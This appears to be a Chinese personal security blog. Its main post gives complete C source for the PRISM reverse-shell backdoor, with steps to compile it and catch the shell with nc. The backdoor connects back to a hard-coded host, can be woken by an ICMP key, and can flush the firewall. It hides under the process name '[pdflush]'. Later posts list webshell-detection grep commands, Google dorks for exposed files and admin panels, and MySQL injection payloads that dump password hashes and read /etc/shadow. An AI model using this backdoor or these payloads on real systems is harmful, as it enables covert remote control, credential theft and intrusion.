本空间内容都是自己的随记,转载请注明出处!


  • nc反弹shell

    2013-08-21 14:54:14

    1、  在目标服务上传c文件test.c

    2、  编译gcc -DDETACH -DSTATIC -Wall -s -o test  test.c

    3、  客户端启动nc

    4、  执行命令 –lpv 443

     此时已经控制了目标服务器,可在客户端执行linux命令

    C源码如下:

    # define REVERSE_HOST     "192.168.20.19"  // 客户端ip

    # define REVERSE_PORT     443  //客户端端口

    #define PROCESS_NAME     "[pdflush]" //启动的进程名

     

    /*

     * PRISM v0.5

     * Reverse Shell Backdoor

     *

     *  by Andrea Fabrizi

     *  http://www.andreafabrizi.it/?prism

     *

     *  ICMP packet mode (Default):

     *   The backdoor waits silently for a specific ICMP packet containing

     *   the host/port (and a security key) to connect.

     *

     *  STATIC mode

     *   The backdoor tries to connect to the specified host/port (REVERSE_HOST/REVERSE_PORT)

     *   every n seconds (RESPAWN_DELAY).

     *

     *  How to compile:

     *   gcc -DDETACH -DSTATIC -Wall -s -o prism prism.c

     *

     *   -DDETACH        #Run process in background

     *   -DSTATIC        #Enable STATIC mode

     *   -DNORENAME      #Don't rename process

     *   -DIPTABLES      #Try to flush all iptables rules

     *

     *  payload.bin file example:

     *   p455w0rD 192.168.0.2 5055

     *

     *   nc -l -p 5055

     *

     *   nemesis icmp -i 8 -c 0 -D 192.168.0.1 -P payload.bin

     *

     */

    #include <stdio.h>

    #include <sys/types.h>

    #include <errno.h>

    #include <stdlib.h>

    #include <string.h>

    #include <stdarg.h>

    #include <netdb.h>

    #include <unistd.h>

    #include <ctype.h>

    #include <netinet/in.h>

    #include <netinet/in_systm.h>

    #include <netinet/ip.h>

    #include <netinet/ip_icmp.h>

    #include <sys/socket.h>

    #include <arpa/inet.h>

    #include <signal.h>

     

    #ifdef STATIC

    # define REVERSE_HOST     "192.168.20.19"

    # define REVERSE_PORT     443

    # define RESPAWN_DELAY    15

    #else

    # define ICMP_PACKET_SIZE 1024

    # define ICMP_KEY         "p455w0rD"

    #endif

     

    #define VERSION          "0.5"

    #define MOTD             "PRISM v"VERSION" started\n\n# "

    #define SHELL            "/bin/sh"

    #define PROCESS_NAME     "[pdflush]"

     

     

    /*

     * Start the reverse shell

     */

    /*
     * Connect a TCP socket to bd_ip:bd_port and replace this process with
     * SHELL, whose stdin/stdout/stderr are the connected socket.
     *
     * bd_ip    host name or dotted-quad string, resolved with gethostbyname()
     * bd_port  TCP port in host byte order (converted with htons() below)
     *
     * Returns silently when socket(), gethostbyname() or connect() fails;
     * the socket descriptor is not closed on those early returns.  On the
     * success path execl() does not return, so the final close(sd) only
     * runs if the exec itself failed.
     *
     * Defender note: the observable artefacts are an outbound TCP connect,
     * a /bin/sh process whose descriptors 0-2 are a socket, and the fixed
     * MOTD banner sent as the first bytes of the stream.
     */
    void start_reverse_shell(char *bd_ip, unsigned short int bd_port)
    {
        int sd;
        struct sockaddr_in serv_addr;
        struct hostent *server;      /* result of the legacy, IPv4-only gethostbyname() */

        /* socket() */
        sd = socket(AF_INET, SOCK_STREAM, 0);
        if (sd < 0)
            return;

        /* name resolution; NULL on failure (not thread-safe, but this code is single-threaded) */
        server = gethostbyname(bd_ip);
        if (server == NULL)
            return;

        bzero((char *) &serv_addr, sizeof(serv_addr));
        serv_addr.sin_family = AF_INET;
        /* h_addr is the first entry of h_addr_list; h_length bytes go into sin_addr */
        bcopy((char *)server->h_addr, (char *)&serv_addr.sin_addr.s_addr, server->h_length);
        serv_addr.sin_port = htons(bd_port);

        /* connect(); sd is leaked on failure */
        if (connect(sd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0)
            return;

        /* motd: fixed "PRISM v0.5 started" banner, write() result ignored */
        write(sd, MOTD, strlen(MOTD));

        /* connect the socket to stdout, stdin and stderr of this process */
        dup2(sd, 0);
        dup2(sd, 1);
        dup2(sd, 2);

        /* running the shell: the process image is replaced, argv[0] = SHELL */
        execl(SHELL, SHELL, (char *)0);
        /* only reached when execl() failed */
        close(sd);
    }

     

    /*

     * Try to flush all iptables rules

     * You can embed here any command you want to be executed from the backdoor :)

     */

    #ifdef IPTABLES

    /*
     * Run nine iptables commands through system() (i.e. "/bin/sh -c"):
     * delete user-defined chains (-X) and flush rules (-F) in the filter,
     * nat and mangle tables, then set the INPUT/FORWARD/OUTPUT default
     * policies to ACCEPT (-P).  stderr of every command is sent to
     * /dev/null and the return values are ignored, so a missing iptables
     * binary or insufficient privileges fail silently.
     *
     * Compiled only when IPTABLES is defined; called before each reverse
     * shell attempt (see icmp_listen() and the STATIC loop in main()).
     *
     * Defender note: a firewall policy reset spawned via sh from a process
     * that is not a firewall manager is a high-signal event for audit/EDR
     * rules; the command strings below are plaintext in the binary.
     */
    void flush_iptables(void)
    {
        /* filter table: chains and rules */
        system("iptables -X 2> /dev/null");
        system("iptables -F 2> /dev/null");
        /* nat table */
        system("iptables -t nat -F 2> /dev/null");
        system("iptables -t nat -X 2> /dev/null");
        /* mangle table */
        system("iptables -t mangle -F 2> /dev/null");
        system("iptables -t mangle -X 2> /dev/null");
        /* default policies: everything is allowed after this */
        system("iptables -P INPUT ACCEPT 2> /dev/null");
        system("iptables -P FORWARD ACCEPT 2> /dev/null");
        system("iptables -P OUTPUT ACCEPT 2> /dev/null");
    }

    #endif

     

    /*

     * ICMP packet mode

     */

    #ifndef STATIC

    /*
     * ICMP activation listener (compiled only when STATIC is not defined).
     *
     * Opens a raw ICMP socket (requires root or CAP_NET_RAW; main() tests
     * the group id before calling this) and blocks in recv() forever.  Each
     * datagram is read as an IPv4 header followed by an ICMP header; when
     * the ICMP type is ICMP_ECHO and the payload starts with ICMP_KEY, the
     * text after the key is parsed as "<host> <port>" and a forked child
     * calls start_reverse_shell() for that endpoint.  The parent keeps
     * listening, so one instance serves any number of activations.
     *
     * Never returns.  The socket() result is not checked: if it fails,
     * recv() on -1 returns -1 every time and the loop spins without ever
     * matching a packet.
     *
     * Defender note: a process holding a SOCK_RAW/IPPROTO_ICMP socket that
     * is not a ping-type utility, and the plaintext ICMP_KEY literal in the
     * binary, are the runtime and static indicators this mode leaves.
     */
    void icmp_listen(void)
    {
        int sockfd,
            n,                  /* bytes returned by recv(), or -1 */
            icmp_key_size;      /* strlen(ICMP_KEY), number of bytes compared */
        char buf[ICMP_PACKET_SIZE + 1];   /* +1 keeps a NUL after a full-size read */
        struct icmp *icmp;
        struct ip *ip;

        icmp_key_size = strlen(ICMP_KEY);
        /* raw socket: the whole IP datagram is delivered; return value not checked */
        sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);

        /*
         * Waiting for the activation ICMP packet
         */
        while (1) {

            /* get the icmp packet; the buffer is zeroed first so sscanf below always sees a terminator */
            bzero(buf, ICMP_PACKET_SIZE + 1);
            n = recv(sockfd, buf, ICMP_PACKET_SIZE,0);
            if (n > 0) {
                ip = (struct ip *)buf;
                /* steps past exactly sizeof(struct ip); the header-length field is not consulted */
                icmp = (struct icmp *)(ip + 1);

                /* If this is an ICMP_ECHO packet and if the KEY is correct.
                 * memcmp reads icmp_key_size bytes regardless of n, but stays inside the zeroed buf. */
                if ((icmp->icmp_type == ICMP_ECHO) && (memcmp(icmp->icmp_data,ICMP_KEY, icmp_key_size) == 0)) {
                    char bd_ip[16];     /* "%15s" below bounds this to 15 chars + NUL */
                    int bd_port;

                    bd_port = 0;
                    bzero(bd_ip, sizeof(bd_ip));
                    /* payload layout is "<key> <host> <port>"; +1 skips the separator after the key */
                    sscanf((char *)(icmp->icmp_data + icmp_key_size + 1), "%15s %d", bd_ip, &bd_port);

                    /* reject a missing port or a host shorter than 7 chars (presumably the shortest dotted quad) */
                    if ((bd_port <= 0) || (strlen(bd_ip) < 7))
                        continue;

                    /* Starting reverse shell in a child; the parent returns to recv().
                     * bd_port is an int and is narrowed to unsigned short at the call. */
                    if (fork() == 0) {
    #ifdef IPTABLES
                        flush_iptables();
    #endif
                        start_reverse_shell(bd_ip, bd_port);
                        /* reached only if start_reverse_shell() returned, i.e. failed before execl() */
                        exit(EXIT_SUCCESS);
                    }
                }
            }
        }
    }

    #endif

     

    /*

     * main ()

     */

    /*
     * Entry point.
     *
     * With exactly one argument spelled "Inf0" the build-time configuration
     * is printed to stdout and the process exits.  Otherwise, unless
     * NORENAME is defined, argv[0] is overwritten in place with PROCESS_NAME
     * and the remaining arguments are blanked; with DETACH the parent exits
     * and the child carries on; then either the STATIC respawn loop or the
     * ICMP listener runs.  The final return is reached only if
     * icmp_listen() returned, which it never does, and the STATIC loop is
     * endless.
     *
     * Defender note: the argv rewrite only changes what /proc/<pid>/cmdline
     * shows.  NOTE(review): presumably /proc/<pid>/exe and the kernel comm
     * name still identify the real binary -- confirm on the target kernel.
     */
    int main(int argc, char *argv[])
    {
        /* Prevent child processes from becoming zombies: with SIGCHLD (SIGCLD is its
         * alias) ignored the kernel reaps children, so no wait() is needed anywhere. */
        signal(SIGCLD, SIG_IGN);
        /* leave the start directory; return value ignored */
        chdir("/");

        /* If argv is equal to Inf0, some info will be printed
         * In this way the "Inf0" string will not be seen in clear text into the binary file :)
         */
        if ((argc == 2) && (argv[1][0] == 'I') && (argv[1][1] == 'n') && (argv[1][2] == 'f') && (argv[1][3] == '0')) {
            fprintf(stdout, " Version:\t\t%s\n"
                            ,VERSION);
    #ifdef STATIC
            fprintf(stdout, " Mode:\t\t\tstatic\n"
                            " Host:\t\t\t%s\n"
                            " Port:\t\t\t%d\n"
                            " Respawn Delay:\t\t%d sec\n"
                            ,REVERSE_HOST, REVERSE_PORT, RESPAWN_DELAY);
    #else
            fprintf(stdout, " Mode:\t\t\ticmp\n"
                            " Key:\t\t\t%s\n"
                            ,ICMP_KEY);
    #endif

    #ifndef NORENAME
            fprintf(stdout, " Process name:\t\t%s\n", PROCESS_NAME);
    #endif

            fprintf(stdout, " Shell:\t\t\t%s\n", SHELL);

    #ifdef DETACH
            fprintf(stdout, " Detach:\t\tYes\n");
    #else
            fprintf(stdout, " Detach:\t\tNo\n");
    #endif

    #ifdef IPTABLES
            fprintf(stdout, " Flush Iptables:\tYes\n");
    #else
            fprintf(stdout, " Flush Iptables:\tNo\n");
    #endif

            exit(EXIT_SUCCESS);
        }

    #ifndef NORENAME
        int i;
        /* Renaming the process: PROCESS_NAME is copied over the existing argv[0]
         * storage, so it is truncated when argv[0] is shorter than the new name
         * and NUL-padded by strncpy when it is longer. */
        strncpy(argv[0], PROCESS_NAME, strlen(argv[0]));
        /* every other argument is replaced by spaces of the same length */
        for (i=1; i<argc; i++)
            memset(argv[i],' ', strlen(argv[i]));
    #endif

    #ifdef DETACH
        /* the parent exits and the child continues; no setsid() and no descriptor
         * cleanup are done, so the child keeps the caller's session and fds */
        if (fork() != 0)
            exit(EXIT_SUCCESS);
    #endif

    #ifdef STATIC
        /* respawn loop: every RESPAWN_DELAY seconds fork a child that tries
         * REVERSE_HOST:REVERSE_PORT.  The child exits when start_reverse_shell()
         * returns (connect or exec failed).  Defender note: this is a
         * fixed-interval outbound connection attempt to a hard-coded endpoint. */
        while (1) {

    #ifdef IPTABLES
            flush_iptables();
    #endif

            /* Starting reverse shell */
            if (fork() == 0) {
                start_reverse_shell(REVERSE_HOST, REVERSE_PORT);
                exit(EXIT_SUCCESS);
            }
            sleep(RESPAWN_DELAY);
        }
    #else
        /* We need root privileges to read ICMP packets!
         * Note that the test is on the real group id, not the user id. */
        if (getgid() != 0) {
            fprintf(stdout, "I'm not root :(\n");
            exit(EXIT_FAILURE);
        }
        /* never returns */
        icmp_listen();
    #endif

        return EXIT_SUCCESS;
    }

     

  • centos上webshell的查找方法

    2013-06-14 08:51:25

    webshell的一些关键字(eval,shell_exec,passthru,popen,system,cmd,szcmd,post,phpspy)查找方法如下:

    find /var/webroot -name "*.php" | xargs grep "eval" | more
    find /var/webroot -name "*.php" | xargs grep "shell_exec" | more
    find /var/webroot -name "*.php" | xargs grep "passthru" | more

    find /var/webroot -name "*.jsp" | xargs grep "popen" | more

    find /home -name "*.php" | xargs grep "fsockopen" | more >test.log

  • 安全测试---- Google Hacking

    2013-05-28 08:41:15

    Google是一款功能强大的搜索引擎,能够根据robots协议抓取互联网上几乎所有页面,其中包括大量账号密码等敏感信息。
    google hacking其实就是利用google搜索的语法,做一些精准的搜索
    1、搜索错误的文件后缀

    搜索内容

    说明

    site: 域名    inurl:jsp.bak/php.bak

    搜索站点中是否存在后缀为 jsp.bak、php.bak 的文件,即某些 jsp、php 文件的备份文件。

    site: 域名    filetype:sql

    搜索站点中是否存在SQL脚本文件

    site: 域名    inurl:log

    搜索站点中是否存在应用程序日志文件,如ftp日志、oracle日志等

    site: 域名    filetype:txt

    查找站点中是否有包含敏感信息的txt文件

    site: 域名    filetype:conf

    查找站点中是否有包含敏感信息的conf文件

    2、查找第三方组件或者程序

    搜索内容

    说明

    site: 域名    inurl:/fckeditor/

    搜索站点是否使用了fckeditor

    site: 域名    inurl:ewebeditor

    搜索站点是否使用了 eWebEditor

    3、搜索错误的配置

    搜索内容

    说明

    site: 域名    intitle:”index of /”

    搜索站点是否使用了列目录功能

    site: 域名    inurl:"examples"

    搜索站点中是否存在测试代码

    4、搜索管理后台

    搜索内容

    说明

    site: 域名     inurl:admin

    site: 域名     inurl:login

    site: 域名     inurl:manage

    site: 域名     inurl:system

    site: 域名     inurl:console

    搜索站点是否对外开放了管理后台

    google搜索语法说明:

    语法 说明
    + 搜索结果要求包含两个或者两个以上的关键字
    - 逻辑非,减号后是要排除的关键字
    “”() 可用来搜索完整的句子,可包括空格
    OR(要大写)与| 搜索结果至少包含关键字中的任意一个
    intitle与allintitle: 对网页标题栏的关键字查询
    inurl与allinurl: 查找网址链接的关键字
    site: 搜索结果局限于某个域名下
    intext与allintext: 只搜索网页body部分中包含的文字
    filetype与ext: 搜索某类文件
    link: 搜索所有链接到某个url地址的网页
    related: 用来搜索结构内容方面相似的网页
    cache: 从google缓存中搜索
    info: 显示与某链接相关的一系列搜索

     

  • 手工注入mysql笔记

    2012-11-30 10:47:34

    让开发同事帮忙写了个页面,没有防止sql注入的。用来学习手工sql注入用到的一些函数和方法,其实就是个验证并记录的过程
    1、判断是否存在注入点
    http://192.168.0.226/inputTest/info.jsp?userid=1 and 1=1 正常执行,页面有结果
    http://192.168.0.226/inputTest/info.jsp?userid=1 and   页面异常,从异常信息可以看出是mysql数据库
    2、判断数据库类型
    3、判断字段数量
    http://192.168.0.226/inputTest/info.jsp?userid=1 order by 9  页面异常,可以看出没有字段9,继续减小数字
    http://192.168.0.226/inputTest/info.jsp?userid=1 order by 2  页面正常输出,说明有2个字段
    http://192.168.0.226/inputTest/info.jsp?userid=1 union select 1,2 页面正常输出
    4、查询当前数据库名称
    http://192.168.0.226/inputTest/info.jsp?userid=1 union select 1,2,database() 页面异常,因为只有2个字段
    http://192.168.0.226/inputTest/info.jsp?userid=1 union select 1,database() 正常输出,最后的显示是数据库名 (test)
    http://192.168.0.226/inputTest/info.jsp?userid=1 union select 1,concat(database()) 正常输出,最后的显示是数据库名
    5、查服务器操作系统
    http://192.168.0.226/inputTest/info.jsp?userid=1 union select 1,@@version_compile_os
    http://192.168.0.226/inputTest/info.jsp?userid=1 union all select 1,@@global.version_compile_os from mysql.user
    6、查询数据库版本和用户
    查询版本可用version() 或者@@version
    查询用户可用user()或System_user()或Session_user()或Current_user()
    http://192.168.0.226/inputTest/info.jsp?userid=1 union all select user(),version()
    7、查询数据库路径
    •@@basedir MySQL安装基准目录
    •@@datadir 数据库存储的地方
    8、查用户和密码
    http://192.168.0.226/inputTest/info.jsp?userid=1 union select 0,group_concat(user,0x3a,password) from mysql.user
    0x3a:分割作用
    9、查询所有库名和表名
    http://192.168.0.226/inputTest/info.jsp?userid=1 union select 0,group_concat(table_schema,0x3a,table_name) from information_schema.tables
    详细情况请查看information_schema库
    10、查看当前库的所有表名
    http://192.168.0.226/inputTest/info.jsp?userid=1 union select 0, group_concat(table_name) from information_schema.tables where table_schema='test'
    11、查看表的字段名
    http://192.168.0.226/inputTest/info.jsp?userid=1 union select 0, group_concat(column_name) from information_schema.columns where table_name='usertest'
    到此为止,数据库基本搞定,根据库,表,字段可以查询出管理后台或者用户的用户名和密码。
    12、读系统文件
    http://192.168.0.226/inputTest/info.jsp?userid=1 union select 0, load_file(0x2F6574632F706173737764)
    •0x633a5c626f6f742e696e69 c:\boot.ini
    •0x2F6574632F706173737764 /etc/passwd
    •0x2F6574632F736861646F77 /etc/shadow